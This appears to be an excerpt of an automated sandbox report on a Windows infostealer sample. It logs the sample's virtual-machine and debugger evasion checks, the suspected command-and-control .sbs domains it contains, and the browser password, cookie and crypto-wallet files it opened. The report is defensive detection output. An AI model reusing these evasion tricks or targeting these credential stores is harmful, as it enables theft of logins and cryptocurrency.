              Source: C:\Users\user\Desktop\file.exe TID: 7680Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7548Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.1677236558.0000000000320000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1683042982.000000000609A000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000000.00000002.1681686094.00000000056AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1678088995.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000000.00000002.1681686094.00000000056AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\j
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1385581848.00000000056F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000000.00000002.1677236558.0000000000320000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1683042982.000000000609A000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1385581848.00000000056EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000002.1677147842.0000000000141000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.1683042982.000000000609A000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: file.exe, file.exe, 00000000.00000002.1677236558.0000000000320000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.1464183566.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463990292.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1678088995.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ta%\\Electrum\\wallets",
              Source: file.exe, 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.jsone
              Source: file.exe, 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Exodus\\exodus.wallet"E
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\Ethereum","m":["keysI
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
